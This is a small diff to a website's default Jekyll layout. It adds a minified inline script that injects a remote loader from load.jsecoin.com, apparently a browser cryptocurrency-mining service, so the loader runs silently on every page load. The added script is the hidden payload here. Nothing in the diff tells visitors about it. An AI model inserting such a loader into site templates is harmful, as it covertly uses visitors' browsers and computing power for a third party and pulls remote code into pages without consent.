--- a/_layouts/default.html
+++ b/_layouts/default.html
@@ -47,5 +47,11 @@
     </div>
 
     {% include analytics.html %}
+<script type="text/javascript">
+!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")
+[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/52346/sourcekode.net/0/0/",s.parentNode.insertBefore(
+t,s)}();
+</script>
+
   </body>
 </html>
